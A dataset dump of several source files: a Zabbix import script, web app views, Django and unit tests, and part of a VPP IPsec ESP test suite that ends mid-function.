hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
acff55f2e701176a8086fea81b515674ad607dfd
| 3,858
|
py
|
Python
|
files/zabbix_content/import_all.py
|
dataart-telco/zabbix-restcomm-docker
|
fe0d6678746ce1206c4bbefe476cb5e42af7bf53
|
[
"Apache-2.0"
] | 1
|
2016-03-10T23:04:12.000Z
|
2016-03-10T23:04:12.000Z
|
files/zabbix_content/import_all.py
|
dataart-telco/zabbix-restcomm-docker
|
fe0d6678746ce1206c4bbefe476cb5e42af7bf53
|
[
"Apache-2.0"
] | null | null | null |
files/zabbix_content/import_all.py
|
dataart-telco/zabbix-restcomm-docker
|
fe0d6678746ce1206c4bbefe476cb5e42af7bf53
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
import pyzabbix, sys, json, os, time
if len(sys.argv) > 2:
IMPORT_DIR = sys.argv[1]
ZABBIX_SERVER = sys.argv[2]
else:
IMPORT_DIR = "import_pack"
ZABBIX_SERVER = 'http://localhost'
print "*****"
print "** App iports files in Lexicographical order from '{0}' folder".format(IMPORT_DIR)
print "*****"
print ""
zapi = pyzabbix.ZabbixAPI(ZABBIX_SERVER)
zapi.login('admin', 'zabbix')
def readFile(f):
with open(f, 'r') as f:
return f.read()
def importAction( str ):
data = json.loads(str)
for action in data:
try:
print "Create: {0}".format(json.dumps(action))
zapi.action.create(action)
except pyzabbix.ZabbixAPIException as e:
print e
def importHostGroups( str ):
data = json.loads(str)
for group in data:
try:
zapi.hostgroup.create({"name": group["name"]})
except pyzabbix.ZabbixAPIException as e:
print e
def importTemplate( str ):
data = json.loads(str)
zapi.template.create(data)
def importTemplateXml( template ):
rules = {
'applications': {
'createMissing': 'true',
'updateExisting': 'true'
},
'discoveryRules': {
'createMissing': 'true',
'updateExisting': 'true'
},
'graphs': {
'createMissing': 'true',
'updateExisting': 'true'
},
'groups': {
'createMissing': 'true'
},
'hosts': {
'createMissing': 'true',
'updateExisting': 'true'
},
'images': {
'createMissing': 'true',
'updateExisting': 'true'
},
'items': {
'createMissing': 'true',
'updateExisting': 'true'
},
'maps': {
'createMissing': 'true',
'updateExisting': 'true'
},
'screens': {
'createMissing': 'true',
'updateExisting': 'true'
},
'templateLinkage': {
'createMissing': 'true',
'updateExisting': 'true'
},
'templates': {
'createMissing': 'true',
'updateExisting': 'true'
},
'templateScreens': {
'createMissing': 'true',
'updateExisting': 'true'
},
'triggers': {
'createMissing': 'true',
'updateExisting': 'true'
},
}
zapi.confimport('xml', template, rules)
def readHostGroupVars():
vars = {}
groups = zapi.hostgroup.get()
for g in groups:
key = g["name"].upper().replace(" ", "_")
vars[key] = g["groupid"]
return vars
def readTemplatesGroupVars():
vars = {}
templates = zapi.template.get()
for t in templates:
key = t["name"].upper().replace(" ", "_")
vars[key] = t["templateid"]
return vars
def replaceVars(data, prefix, dic):
for key, value in dic.iteritems():
data = data.replace("<" + prefix + key + ">", value)
return data
dir = os.path.abspath(IMPORT_DIR)
for fileName in sorted(os.listdir(IMPORT_DIR)):
print ""
print "import {0}".format(fileName)
print "-----"
f = os.path.join(dir, fileName)
data = readFile(f)
time.sleep(1)
basename = os.path.basename(f)
if "action" in basename:
varGroups = readHostGroupVars()
varTpls = readTemplatesGroupVars()
data = replaceVars(data, "REPLACE_ME_GROUP_", varGroups)
data = replaceVars(data, "REPLACE_ME_TPLS_", varTpls)
importAction(data)
continue
if "hostgroup" in basename:
importHostGroups(data)
continue
if "template.xml" in basename:
importTemplateXml(data)
continue
if "template" in basename:
importTemplate(data)
continue
| 26.244898
| 89
| 0.537066
|
acff56f01eb4d75139b1709b2ec135151d193a6a
| 2,917
|
py
|
Python
|
src/softfab/pages/ResTypeIndex.py
|
boxingbeetle/softfab
|
0ecf899f66a1fb046ee869cbfa3b5374b3f8aa14
|
[
"BSD-3-Clause"
] | 20
|
2019-02-07T17:03:04.000Z
|
2020-03-16T20:45:19.000Z
|
src/softfab/pages/ResTypeIndex.py
|
boxingbeetle/softfab
|
0ecf899f66a1fb046ee869cbfa3b5374b3f8aa14
|
[
"BSD-3-Clause"
] | 36
|
2019-02-11T08:57:16.000Z
|
2020-09-29T05:32:08.000Z
|
src/softfab/pages/ResTypeIndex.py
|
boxingbeetle/softfab
|
0ecf899f66a1fb046ee869cbfa3b5374b3f8aa14
|
[
"BSD-3-Clause"
] | null | null | null |
# SPDX-License-Identifier: BSD-3-Clause
from functools import partial
from typing import Any, ClassVar, Iterator, cast
from softfab.FabPage import FabPage
from softfab.Page import PageProcessor
from softfab.databaselib import Retriever
from softfab.datawidgets import (
BoolDataColumn, DataColumn, DataTable, LinkColumn
)
from softfab.pageargs import IntArg, PageArgs, SortArg
from softfab.resourcelib import ResourceDB
from softfab.restypelib import ResType, ResTypeDB
from softfab.users import User, checkPrivilege
from softfab.xmlgen import XMLContent
def numResourcesOfType(resourceDB: ResourceDB, resType: ResType) -> int:
return len(resourceDB.resourcesOfType(resType.getId()))
class ResCountLinkColumn(LinkColumn[ResType]):
keyName = 'count'
cellStyle = 'rightalign'
def __init__(self) -> None:
super().__init__('#', 'Capabilities', idArg='restype')
def getSortKey(self, proc: PageProcessor) -> Retriever[ResType, str]:
assert isinstance(proc, ResTypeIndex_GET.Processor)
return cast(Retriever[ResType, str],
partial(numResourcesOfType, proc.resourceDB))
def presentCell(self, record: ResType, **kwargs: object) -> XMLContent:
proc = kwargs['proc']
assert isinstance(proc, ResTypeIndex_GET.Processor)
return self.presentLink(record, **kwargs)[
numResourcesOfType(proc.resourceDB, record)
]
class ResTypeLinkColumn(LinkColumn[ResType]):
def presentCell(self, record: ResType, **kwargs: object) -> XMLContent:
if record.getId().startswith('sf.'):
return '-'
else:
return super().presentCell(record, **kwargs)
class ResTypeTable(DataTable[ResType]):
dbName = 'resTypeDB'
columns = (
DataColumn[ResType](keyName = 'presentationName', label = 'Name'),
ResCountLinkColumn(),
BoolDataColumn[ResType](keyName = 'pertask', label = 'Per Task'),
BoolDataColumn[ResType](keyName = 'perjob', label = 'Per Job'),
ResTypeLinkColumn('Edit', 'ResTypeEdit'),
ResTypeLinkColumn('Delete', 'ResTypeDelete'),
)
class ResTypeIndex_GET(FabPage['ResTypeIndex_GET.Processor',
'ResTypeIndex_GET.Arguments']):
icon = 'IconResources'
description = 'Resource Types'
children = [ 'ResTypeEdit', 'ResTypeDelete' ]
class Arguments(PageArgs):
first = IntArg(0)
sort = SortArg()
class Processor(PageProcessor['ResTypeIndex_GET.Arguments']):
resTypeDB: ClassVar[ResTypeDB]
resourceDB: ClassVar[ResourceDB]
def checkAccess(self, user: User) -> None:
checkPrivilege(user, 'rt/l')
def iterDataTables(self, proc: Processor) -> Iterator[DataTable[Any]]:
yield ResTypeTable.instance
def presentContent(self, **kwargs: object) -> XMLContent:
return ResTypeTable.instance.present(**kwargs)
| 35.573171
| 75
| 0.687693
|
acff57810821b4bb7fa3978755138cba27fa72ad
| 739
|
py
|
Python
|
python/ray/data/datasource/binary_datasource.py
|
77loopin/ray
|
9322f6aab53f4ca5baf5a3573e1ffde12feae519
|
[
"Apache-2.0"
] | 21,382
|
2016-09-26T23:12:52.000Z
|
2022-03-31T21:47:45.000Z
|
python/ray/data/datasource/binary_datasource.py
|
77loopin/ray
|
9322f6aab53f4ca5baf5a3573e1ffde12feae519
|
[
"Apache-2.0"
] | 19,689
|
2016-09-17T08:21:25.000Z
|
2022-03-31T23:59:30.000Z
|
python/ray/data/datasource/binary_datasource.py
|
77loopin/ray
|
9322f6aab53f4ca5baf5a3573e1ffde12feae519
|
[
"Apache-2.0"
] | 4,114
|
2016-09-23T18:54:01.000Z
|
2022-03-31T15:07:32.000Z
|
from typing import TYPE_CHECKING
if TYPE_CHECKING:
import pyarrow
from ray.data.datasource.file_based_datasource import (FileBasedDatasource)
class BinaryDatasource(FileBasedDatasource):
"""Binary datasource, for reading and writing binary files.
Examples:
>>> source = BinaryDatasource()
>>> ray.data.read_datasource(source, paths="/path/to/dir").take()
... [b"file_data", ...]
"""
def _read_file(self, f: "pyarrow.NativeFile", path: str, **reader_args):
include_paths = reader_args.pop("include_paths", False)
data = f.readall()
if include_paths:
return path, data
else:
return data
def _rows_per_file(self):
return 1
| 26.392857
| 76
| 0.64682
|
acff57bb3502071b42fadff8c7ea1ad2a2c53aa4
| 1,270
|
py
|
Python
|
comment/migrations/0001_initial.py
|
fihyer/typedia
|
87ac445f5ca65582344847a0c414b9604e40192b
|
[
"MIT"
] | null | null | null |
comment/migrations/0001_initial.py
|
fihyer/typedia
|
87ac445f5ca65582344847a0c414b9604e40192b
|
[
"MIT"
] | 1
|
2022-03-02T15:12:40.000Z
|
2022-03-02T15:12:40.000Z
|
comment/migrations/0001_initial.py
|
fihyer/typeidea
|
87ac445f5ca65582344847a0c414b9604e40192b
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.12 on 2021-02-20 03:14
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.CharField(max_length=2000, verbose_name='内容')),
('nickname', models.CharField(max_length=50, verbose_name='昵称')),
('website', models.URLField(verbose_name='网站')),
('email', models.EmailField(max_length=254, verbose_name='邮箱')),
('status', models.PositiveIntegerField(choices=[(1, '正常'), (0, '删除')], default=1, verbose_name='状态')),
('created_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('target', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='blog.Post', verbose_name='评论目标')),
],
options={
'verbose_name': '评论',
'verbose_name_plural': '评论',
},
),
]
| 37.352941
| 128
| 0.577165
|
acff582053d12f4104237452188dd15a17eeb173
| 1,551
|
py
|
Python
|
unit_tests/test_content_security_policy.py
|
LandRegistry/digital-street-title-ui
|
3477c51be8806289da02c758ca5f0732d0444a8f
|
[
"MIT"
] | null | null | null |
unit_tests/test_content_security_policy.py
|
LandRegistry/digital-street-title-ui
|
3477c51be8806289da02c758ca5f0732d0444a8f
|
[
"MIT"
] | null | null | null |
unit_tests/test_content_security_policy.py
|
LandRegistry/digital-street-title-ui
|
3477c51be8806289da02c758ca5f0732d0444a8f
|
[
"MIT"
] | 3
|
2019-04-26T06:38:12.000Z
|
2021-04-11T05:22:21.000Z
|
import json
import unittest
from unittest import mock
from title_ui.main import app
from title_ui.custom_extensions.content_security_policy.main import ContentSecurityPolicy
class TestContentSecurityPolicy(unittest.TestCase):
def setup_method(self, method):
self.app = app.test_client()
@mock.patch('title_ui.custom_extensions.content_security_policy.main.ContentSecurityPolicy.init_app')
def test_extension_alternative_init(self, mock_init_app):
ContentSecurityPolicy('foo')
mock_init_app.assert_called_once_with('foo')
def test_reporting_mode(self):
app.config['CONTENT_SECURITY_POLICY_MODE'] = 'report-only'
response = self.app.get('/')
assert 'script-src' in response.headers['Content-Security-Policy-Report-Only']
def test_full_mode(self):
app.config['CONTENT_SECURITY_POLICY_MODE'] = 'full'
response = self.app.get('/')
assert 'script-src' in response.headers['Content-Security-Policy']
@mock.patch('title_ui.custom_extensions.content_security_policy.reporting.logger.error')
def test_report_route(self, mock_logger):
response = self.app.post('/content-security-policy-report/?trace_id=Hello',
data=json.dumps({'csp-report': {'foo': 'bar'}}),
content_type='application/json')
mock_logger.assert_called_once_with('CSP violation', extra={
'content_security_policy_report': {'foo': 'bar'}
})
assert response.status_code == 204
| 37.829268
| 105
| 0.695035
|
acff5858e40d1cf608b13b125fcb2057f293f839
| 4,038
|
py
|
Python
|
imperative/python/test/unit/functional/test_math.py
|
googol-lab/MegEngine
|
e0193cc4431371719a6ddb0fa85f910c5583bfc8
|
[
"Apache-2.0"
] | 1
|
2021-03-25T01:13:24.000Z
|
2021-03-25T01:13:24.000Z
|
imperative/python/test/unit/functional/test_math.py
|
googol-lab/MegEngine
|
e0193cc4431371719a6ddb0fa85f910c5583bfc8
|
[
"Apache-2.0"
] | 1
|
2021-05-27T08:55:38.000Z
|
2021-05-27T08:55:38.000Z
|
imperative/python/test/unit/functional/test_math.py
|
googol-lab/MegEngine
|
e0193cc4431371719a6ddb0fa85f910c5583bfc8
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
from functools import partial
import numpy as np
from utils import opr_test
import megengine.functional as F
from megengine import tensor
def common_test_reduce(opr, ref_opr):
data1_shape = (5, 6, 7)
data2_shape = (2, 9, 12)
data1 = np.random.random(data1_shape).astype(np.float32)
data2 = np.random.random(data2_shape).astype(np.float32)
cases = [{"input": data1}, {"input": data2}]
if opr not in (F.argmin, F.argmax):
# test default axis
opr_test(cases, opr, ref_fn=ref_opr)
# test all axises in range of input shape
for axis in range(-3, 3):
# test keepdims False
opr_test(cases, opr, ref_fn=lambda x: ref_opr(x, axis=axis), axis=axis)
# test keepdims True
opr_test(
cases,
opr,
ref_fn=lambda x: ref_opr(x, axis=axis, keepdims=True),
axis=axis,
keepdims=True,
)
else:
# test defaut axis
opr_test(cases, opr, ref_fn=lambda x: ref_opr(x).astype(np.int32))
# test all axises in range of input shape
for axis in range(0, 3):
opr_test(
cases,
opr,
ref_fn=lambda x: ref_opr(x, axis=axis).astype(np.int32),
axis=axis,
)
def test_sum():
common_test_reduce(opr=F.sum, ref_opr=np.sum)
def test_prod():
common_test_reduce(opr=F.prod, ref_opr=np.prod)
def test_mean():
common_test_reduce(opr=F.mean, ref_opr=np.mean)
def test_var():
common_test_reduce(opr=F.var, ref_opr=np.var)
def test_std():
common_test_reduce(opr=F.std, ref_opr=np.std)
def test_min():
common_test_reduce(opr=F.min, ref_opr=np.min)
def test_max():
common_test_reduce(opr=F.max, ref_opr=np.max)
def test_argmin():
common_test_reduce(opr=F.argmin, ref_opr=np.argmin)
def test_argmax():
common_test_reduce(opr=F.argmax, ref_opr=np.argmax)
def test_sqrt():
d1_shape = (15,)
d2_shape = (25,)
d1 = np.random.random(d1_shape).astype(np.float32)
d2 = np.random.random(d2_shape).astype(np.float32)
cases = [{"input": d1}, {"input": d2}]
opr_test(cases, F.sqrt, ref_fn=np.sqrt)
def test_sort():
data1_shape = (10, 3)
data2_shape = (12, 2)
data1 = np.random.random(data1_shape).astype(np.float32)
data2 = np.random.random(data2_shape).astype(np.float32)
output0 = [np.sort(data1), np.argsort(data1).astype(np.int32)]
output1 = [np.sort(data2), np.argsort(data2).astype(np.int32)]
cases = [
{"input": data1, "output": output0},
{"input": data2, "output": output1},
]
opr_test(cases, F.sort)
def test_normalize():
cases = [
{"input": np.random.random((2, 3, 12, 12)).astype(np.float32)} for i in range(2)
]
def np_normalize(x, p=2, axis=None, eps=1e-12):
if axis is None:
norm = np.sum(x ** p) ** (1.0 / p)
else:
norm = np.sum(x ** p, axis=axis, keepdims=True) ** (1.0 / p)
return x / np.clip(norm, a_min=eps, a_max=np.inf)
# # Test L-2 norm along all dimensions
# opr_test(cases, F.normalize, ref_fn=np_normalize)
# # Test L-1 norm along all dimensions
# opr_test(cases, partial(F.normalize, p=1), ref_fn=partial(np_normalize, p=1))
# Test L-2 norm along the second dimension
opr_test(cases, partial(F.normalize, axis=1), ref_fn=partial(np_normalize, axis=1))
# Test some norm == 0
cases[0]["input"][0, 0, 0, :] = 0
cases[1]["input"][0, 0, 0, :] = 0
opr_test(cases, partial(F.normalize, axis=3), ref_fn=partial(np_normalize, axis=3))
| 28.842857
| 88
| 0.620357
|
acff59317c389d2324fb157b16accc890a2da81b
| 1,052
|
py
|
Python
|
stix2slider/test/test_main.py
|
nhova/cti-stix-slider
|
3964c907cda457b747b711655f89c28e8cb863c1
|
[
"BSD-3-Clause"
] | 17
|
2017-11-29T19:11:41.000Z
|
2022-01-10T07:04:34.000Z
|
stix2slider/test/test_main.py
|
nhova/cti-stix-slider
|
3964c907cda457b747b711655f89c28e8cb863c1
|
[
"BSD-3-Clause"
] | 56
|
2017-11-29T01:20:32.000Z
|
2021-08-23T21:09:25.000Z
|
stix2slider/test/test_main.py
|
nhova/cti-stix-slider
|
3964c907cda457b747b711655f89c28e8cb863c1
|
[
"BSD-3-Clause"
] | 9
|
2017-11-29T17:57:31.000Z
|
2020-09-02T03:17:17.000Z
|
# Standard Library
from argparse import Namespace
# external
import pytest
# internal
from stix2slider import options
from stix2slider.options import (
SliderOptions, get_option_value, initialize_options
)
@pytest.mark.parametrize("opts", [
SliderOptions(no_squirrel_gaps=False, use_namespace="foobar", log_level="DEBUG", disabled=[201, 302]),
{"no_squirrel_gaps": False, "use_namespace": "foobar", "log_level": "DEBUG", "disabled": [201, 302]},
Namespace(file_=None, no_squirrel_gaps=False, validator_args="", enabled=None, disabled=[201, 302],
silent=False, message_log_directory=None, output_directory=None, log_level="DEBUG",
use_namespace="foobar"),
])
def test_setup_options(opts):
options.ALL_OPTIONS = None # To make sure we can set it again
initialize_options(opts)
assert get_option_value("no_squirrel_gaps") is False
assert get_option_value("use_namespace") == "foobar"
assert get_option_value("log_level") == "DEBUG"
assert get_option_value("disabled") == [201, 302]
| 37.571429
| 106
| 0.728137
|
acff594c55e0c7508839bb6c4bef807f22cf494b
| 3,698
|
py
|
Python
|
clients/python/lakefs_client/models/__init__.py
|
cmarat/lakeFS
|
a5e4693fe571fd289fa3d14f4fb0c00928d004c3
|
[
"Apache-2.0"
] | 1
|
2021-09-09T16:21:14.000Z
|
2021-09-09T16:21:14.000Z
|
clients/python/lakefs_client/models/__init__.py
|
cmarat/lakeFS
|
a5e4693fe571fd289fa3d14f4fb0c00928d004c3
|
[
"Apache-2.0"
] | null | null | null |
clients/python/lakefs_client/models/__init__.py
|
cmarat/lakeFS
|
a5e4693fe571fd289fa3d14f4fb0c00928d004c3
|
[
"Apache-2.0"
] | null | null | null |
# flake8: noqa
# import all models into this package
# if you have many models here with many references from one model to another this may
# raise a RecursionError
# to avoid this, import only the models that you directly need like:
# from from lakefs_client.model.pet import Pet
# or import this package, but before doing it, use:
# import sys
# sys.setrecursionlimit(n)
from lakefs_client.model.access_key_credentials import AccessKeyCredentials
from lakefs_client.model.action_run import ActionRun
from lakefs_client.model.action_run_list import ActionRunList
from lakefs_client.model.authentication_token import AuthenticationToken
from lakefs_client.model.branch_creation import BranchCreation
from lakefs_client.model.commit import Commit
from lakefs_client.model.commit_creation import CommitCreation
from lakefs_client.model.commit_list import CommitList
from lakefs_client.model.credentials import Credentials
from lakefs_client.model.credentials_list import CredentialsList
from lakefs_client.model.credentials_with_secret import CredentialsWithSecret
from lakefs_client.model.current_user import CurrentUser
from lakefs_client.model.diff import Diff
from lakefs_client.model.diff_list import DiffList
from lakefs_client.model.error import Error
from lakefs_client.model.garbage_collection_prepare_request import GarbageCollectionPrepareRequest
from lakefs_client.model.garbage_collection_prepare_response import GarbageCollectionPrepareResponse
from lakefs_client.model.garbage_collection_rule import GarbageCollectionRule
from lakefs_client.model.garbage_collection_rules import GarbageCollectionRules
from lakefs_client.model.group import Group
from lakefs_client.model.group_creation import GroupCreation
from lakefs_client.model.group_list import GroupList
from lakefs_client.model.hook_run import HookRun
from lakefs_client.model.hook_run_list import HookRunList
from lakefs_client.model.login_information import LoginInformation
from lakefs_client.model.merge import Merge
from lakefs_client.model.merge_result import MergeResult
from lakefs_client.model.merge_result_summary import MergeResultSummary
from lakefs_client.model.object_stage_creation import ObjectStageCreation
from lakefs_client.model.object_stats import ObjectStats
from lakefs_client.model.object_stats_list import ObjectStatsList
from lakefs_client.model.object_user_metadata import ObjectUserMetadata
from lakefs_client.model.pagination import Pagination
from lakefs_client.model.policy import Policy
from lakefs_client.model.policy_list import PolicyList
from lakefs_client.model.ref import Ref
from lakefs_client.model.ref_list import RefList
from lakefs_client.model.refs_dump import RefsDump
from lakefs_client.model.repository import Repository
from lakefs_client.model.repository_creation import RepositoryCreation
from lakefs_client.model.repository_list import RepositoryList
from lakefs_client.model.reset_creation import ResetCreation
from lakefs_client.model.revert_creation import RevertCreation
from lakefs_client.model.setup import Setup
from lakefs_client.model.staging_location import StagingLocation
from lakefs_client.model.staging_metadata import StagingMetadata
from lakefs_client.model.statement import Statement
from lakefs_client.model.storage_config import StorageConfig
from lakefs_client.model.storage_uri import StorageURI
from lakefs_client.model.tag_creation import TagCreation
from lakefs_client.model.underlying_object_properties import UnderlyingObjectProperties
from lakefs_client.model.user import User
from lakefs_client.model.user_creation import UserCreation
from lakefs_client.model.user_list import UserList
from lakefs_client.model.version_config import VersionConfig
| 55.19403
| 100
| 0.887236
|
acff595996b6b0fb67f8a3afd1a68741724f24bf
| 51,618
|
py
|
Python
|
test/test_ipsec_esp.py
|
StanleyLiao/vpp
|
8f10b9050dc6318d7ccb3982eec2ed742752c6ea
|
[
"Apache-2.0"
] | null | null | null |
test/test_ipsec_esp.py
|
StanleyLiao/vpp
|
8f10b9050dc6318d7ccb3982eec2ed742752c6ea
|
[
"Apache-2.0"
] | null | null | null |
test/test_ipsec_esp.py
|
StanleyLiao/vpp
|
8f10b9050dc6318d7ccb3982eec2ed742752c6ea
|
[
"Apache-2.0"
] | null | null | null |
import socket
import unittest
from scapy.layers.ipsec import ESP
from scapy.layers.inet import IP, ICMP, UDP
from scapy.layers.inet6 import IPv6
from scapy.layers.l2 import Ether
from scapy.packet import Raw
from parameterized import parameterized
from framework import VppTestRunner
from template_ipsec import IpsecTra46Tests, IpsecTun46Tests, TemplateIpsec, \
IpsecTcpTests, IpsecTun4Tests, IpsecTra4Tests, config_tra_params, \
config_tun_params, IPsecIPv4Params, IPsecIPv6Params, \
IpsecTra4, IpsecTun4, IpsecTra6, IpsecTun6, \
IpsecTun6HandoffTests, IpsecTun4HandoffTests, \
IpsecTra6ExtTests
from vpp_ipsec import VppIpsecSpd, VppIpsecSpdEntry, VppIpsecSA,\
VppIpsecSpdItfBinding
from vpp_ip_route import VppIpRoute, VppRoutePath
from vpp_ip import DpoProto
from vpp_papi import VppEnum
NUM_PKTS = 67
engines_supporting_chain_bufs = ["openssl"]
engines = ["ia32", "ipsecmb", "openssl"]
class ConfigIpsecESP(TemplateIpsec):
encryption_type = ESP
tra4_encrypt_node_name = "esp4-encrypt"
tra4_decrypt_node_name = ["esp4-decrypt", "esp4-decrypt-post"]
tra6_encrypt_node_name = "esp6-encrypt"
tra6_decrypt_node_name = ["esp6-decrypt", "esp6-decrypt-post"]
tun4_encrypt_node_name = "esp4-encrypt"
tun4_decrypt_node_name = ["esp4-decrypt", "esp4-decrypt-post"]
tun6_encrypt_node_name = "esp6-encrypt"
tun6_decrypt_node_name = ["esp6-decrypt", "esp6-decrypt-post"]
@classmethod
def setUpClass(cls):
super(ConfigIpsecESP, cls).setUpClass()
@classmethod
def tearDownClass(cls):
super(ConfigIpsecESP, cls).tearDownClass()
def setUp(self):
super(ConfigIpsecESP, self).setUp()
def tearDown(self):
super(ConfigIpsecESP, self).tearDown()
def config_network(self, params):
self.net_objs = []
self.tun_if = self.pg0
self.tra_if = self.pg2
self.logger.info(self.vapi.ppcli("show int addr"))
self.tra_spd = VppIpsecSpd(self, self.tra_spd_id)
self.tra_spd.add_vpp_config()
self.net_objs.append(self.tra_spd)
self.tun_spd = VppIpsecSpd(self, self.tun_spd_id)
self.tun_spd.add_vpp_config()
self.net_objs.append(self.tun_spd)
b = VppIpsecSpdItfBinding(self, self.tun_spd,
self.tun_if)
b.add_vpp_config()
self.net_objs.append(b)
b = VppIpsecSpdItfBinding(self, self.tra_spd,
self.tra_if)
b.add_vpp_config()
self.net_objs.append(b)
for p in params:
self.config_esp_tra(p)
config_tra_params(p, self.encryption_type)
for p in params:
self.config_esp_tun(p)
config_tun_params(p, self.encryption_type, self.tun_if)
for p in params:
d = DpoProto.DPO_PROTO_IP6 if p.is_ipv6 else DpoProto.DPO_PROTO_IP4
r = VppIpRoute(self, p.remote_tun_if_host, p.addr_len,
[VppRoutePath(self.tun_if.remote_addr[p.addr_type],
0xffffffff,
proto=d)])
r.add_vpp_config()
self.net_objs.append(r)
self.logger.info(self.vapi.ppcli("show ipsec all"))
def unconfig_network(self):
for o in reversed(self.net_objs):
o.remove_vpp_config()
self.net_objs = []
def config_esp_tun(self, params):
addr_type = params.addr_type
scapy_tun_sa_id = params.scapy_tun_sa_id
scapy_tun_spi = params.scapy_tun_spi
vpp_tun_sa_id = params.vpp_tun_sa_id
vpp_tun_spi = params.vpp_tun_spi
auth_algo_vpp_id = params.auth_algo_vpp_id
auth_key = params.auth_key
crypt_algo_vpp_id = params.crypt_algo_vpp_id
crypt_key = params.crypt_key
remote_tun_if_host = params.remote_tun_if_host
addr_any = params.addr_any
addr_bcast = params.addr_bcast
e = VppEnum.vl_api_ipsec_spd_action_t
flags = params.flags
tun_flags = params.tun_flags
salt = params.salt
objs = []
params.tun_sa_in = VppIpsecSA(self, scapy_tun_sa_id, scapy_tun_spi,
auth_algo_vpp_id, auth_key,
crypt_algo_vpp_id, crypt_key,
self.vpp_esp_protocol,
self.tun_if.local_addr[addr_type],
self.tun_if.remote_addr[addr_type],
tun_flags=tun_flags,
dscp=params.dscp,
flags=flags,
salt=salt,
hop_limit=params.outer_hop_limit)
params.tun_sa_out = VppIpsecSA(self, vpp_tun_sa_id, vpp_tun_spi,
auth_algo_vpp_id, auth_key,
crypt_algo_vpp_id, crypt_key,
self.vpp_esp_protocol,
self.tun_if.remote_addr[addr_type],
self.tun_if.local_addr[addr_type],
tun_flags=tun_flags,
dscp=params.dscp,
flags=flags,
salt=salt,
hop_limit=params.outer_hop_limit)
objs.append(params.tun_sa_in)
objs.append(params.tun_sa_out)
params.spd_policy_in_any = VppIpsecSpdEntry(self, self.tun_spd,
scapy_tun_sa_id,
addr_any, addr_bcast,
addr_any, addr_bcast,
socket.IPPROTO_ESP)
params.spd_policy_out_any = VppIpsecSpdEntry(self, self.tun_spd,
scapy_tun_sa_id,
addr_any, addr_bcast,
addr_any, addr_bcast,
socket.IPPROTO_ESP,
is_outbound=0)
objs.append(params.spd_policy_out_any)
objs.append(params.spd_policy_in_any)
objs.append(VppIpsecSpdEntry(self, self.tun_spd, vpp_tun_sa_id,
remote_tun_if_host, remote_tun_if_host,
self.pg1.remote_addr[addr_type],
self.pg1.remote_addr[addr_type],
0,
priority=10,
policy=e.IPSEC_API_SPD_ACTION_PROTECT,
is_outbound=0))
objs.append(VppIpsecSpdEntry(self, self.tun_spd, scapy_tun_sa_id,
self.pg1.remote_addr[addr_type],
self.pg1.remote_addr[addr_type],
remote_tun_if_host, remote_tun_if_host,
0,
policy=e.IPSEC_API_SPD_ACTION_PROTECT,
priority=10))
objs.append(VppIpsecSpdEntry(self, self.tun_spd, vpp_tun_sa_id,
remote_tun_if_host, remote_tun_if_host,
self.pg0.local_addr[addr_type],
self.pg0.local_addr[addr_type],
0,
priority=20,
policy=e.IPSEC_API_SPD_ACTION_PROTECT,
is_outbound=0))
objs.append(VppIpsecSpdEntry(self, self.tun_spd, scapy_tun_sa_id,
self.pg0.local_addr[addr_type],
self.pg0.local_addr[addr_type],
remote_tun_if_host, remote_tun_if_host,
0,
policy=e.IPSEC_API_SPD_ACTION_PROTECT,
priority=20))
for o in objs:
o.add_vpp_config()
self.net_objs = self.net_objs + objs
def config_esp_tra(self, params):
addr_type = params.addr_type
scapy_tra_sa_id = params.scapy_tra_sa_id
scapy_tra_spi = params.scapy_tra_spi
vpp_tra_sa_id = params.vpp_tra_sa_id
vpp_tra_spi = params.vpp_tra_spi
auth_algo_vpp_id = params.auth_algo_vpp_id
auth_key = params.auth_key
crypt_algo_vpp_id = params.crypt_algo_vpp_id
crypt_key = params.crypt_key
addr_any = params.addr_any
addr_bcast = params.addr_bcast
flags = (VppEnum.vl_api_ipsec_sad_flags_t.
IPSEC_API_SAD_FLAG_USE_ANTI_REPLAY)
e = VppEnum.vl_api_ipsec_spd_action_t
flags = params.flags | flags
salt = params.salt
objs = []
params.tra_sa_in = VppIpsecSA(self, scapy_tra_sa_id, scapy_tra_spi,
auth_algo_vpp_id, auth_key,
crypt_algo_vpp_id, crypt_key,
self.vpp_esp_protocol,
flags=flags,
salt=salt)
